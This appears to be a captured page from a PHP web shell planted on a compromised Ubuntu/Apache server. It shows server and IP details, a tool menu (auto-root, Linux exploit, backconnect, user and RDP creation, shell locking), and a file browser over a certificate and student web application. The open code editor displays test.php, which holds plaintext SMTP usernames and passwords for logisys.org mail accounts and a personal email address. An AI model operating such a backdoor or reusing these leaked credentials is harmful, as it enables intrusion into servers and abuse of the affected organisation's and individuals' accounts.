Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.168.68
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
bnu /
custom_src /
[ HOME SHELL ]
Name
Size
Permission
Action
admin.php
6.86
KB
-rwxr-xr-x
cManualMailer.php
1.38
KB
-rwxr-xr-x
candidate_certificate.php
7.6
KB
-rwxr-xr-x
common_data.php
1.91
KB
-rwxr-xr-x
dash_board_client.php
4.4
KB
-rwxr-xr-x
dashboard_customer.php
13.56
KB
-rwxr-xr-x
display_custom_html.php
8.47
KB
-rwxr-xr-x
execute_query.php
754
B
-rwxr-xr-x
get_commmon_data.php
3.76
KB
-rwxr-xr-x
pending_certificate.php
8.15
KB
-rwxr-xr-x
phpinfo.php
19
B
-rwxr-xr-x
sendGridMail.php
1.29
KB
-rwxr-xr-x
sendsmsapi.php
1014
B
-rwxr-xr-x
student.php
33.81
KB
-rwxr-xr-x
test.php
3.38
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test.php
<?php /* ini_set("memory_limit",-1); ini_set('max_execution_time', 1400); ini_set("display_errors","On"); require_once(dirname(dirname(__FILE__)).'/phpmailer/class.phpmailer.php'); $mail = new PHPMailer(); //$mail->IsSMTP(); // telling the class to use SMTP $mail->Mailer = "smtp"; $mail->SMTPSecure = 'ssl'; $mail->Host = "smtp.zoho.com"; $mail->Port = 465; $mail->SMTPAuth = true; // turn on SMTP authentication $mail->Username = "sandeep.n@logisys.org"; // SMTP username $mail->Password = "sandeep23"; // SMTP password $mail->From = "sandeep.n@logisys.org"; $mail->AddAddress("sandeepmurthy406@gmail.com"); $mail->Subject = "First PHPMailer Message"; $mail->Body = "Hi! \n\n This is my first e-mail sent through PHPMailer."; $mail->WordWrap = 50; if(!$mail->Send()) { echo 'Message was not sent.'; echo 'Mailer error: ' . $mail->ErrorInfo; } else { echo 'Message has been sent.'; } */ function send_manual_mailold($to,$subject,$message,$replay_to=null,$cc=null,$bcc=null) { require_once(dirname(dirname(__FILE__)).'/phpmailer/class.phpmailer.php'); $mail = new PHPMailer(); $mail->IsSMTP(); // telling the class to use SMTP $mail->SMTPSecure = "ssl"; $mail->Mailer = "smtp"; $mail->Host = "smtp.zoho.com"; // SMTP server $mail->SMTPAuth = true; // enable SMTP authentication $mail->Port = 465; // set the SMTP port for the GMAIL server $mail->Username = "sandeep.n@logisys.org"; // SMTP account username $mail->Password = "sandeep23"; // SMTP account password */ /* $to_arr=explode(",",$to); foreach($to_arr as $v) { if(!empty($v)) $mail->AddAddress($v); } */ $mail->From = "sandeep.n@logisys.org"; $mail->AddAddress($to); $mail->Body = $message; $mail->WordWrap = 50; if(!$mail->Send()) { $data="Message was not sent Mailer Error: " . $mail->ErrorInfo; } else { $data='true'; } return $data; } function send_manual_mail($to,$subject,$message,$replay_to=null,$cc=null,$bcc=null) { require_once(dirname(dirname(__FILE__)).'/phpmailer/class.phpmailer.php'); $mail = new PHPMailer(); $mail->IsSMTP(); // telling the class to use SMTP $mail->SMTPSecure = "ssl"; $mail->Mailer = "smtp"; $mail->Host = "smtp.zoho.com"; // SMTP server $mail->SMTPAuth = true; // enable SMTP authentication $mail->Port = 465; // set the SMTP port for the GMAIL server $mail->Username = "support@logisys.org"; // SMTP account username $mail->Password = "logisys124"; // SMTP account password */ $to_arr=explode(",",$to); foreach($to_arr as $v) { if(!empty($v)) $mail->AddAddress($v,$v); } $cc_arr=explode(",",$cc); foreach($cc_arr as $v) { if(!empty($v)) $mail->AddCC($v,$v); } $mail->AddReplyTo("support@logisys.org","support@logisys.org"); $mail->SetFrom('support@logisys.org', 'support@logisys.org'); $mail->WordWrap = 50; // set word wrap $mail->IsHTML(true); // send as HTML $mail->Subject = $subject; $mail->Body = $message; $mail->AltBody = $message; if(!$mail->Send()) { $data="Message was not sent Mailer Error: " . $mail->ErrorInfo; } else { $data='true'; } return $data; } echo send_manual_mail('sandeepmurthy406@gmail.com','test','test dasdasd'); ?>
Close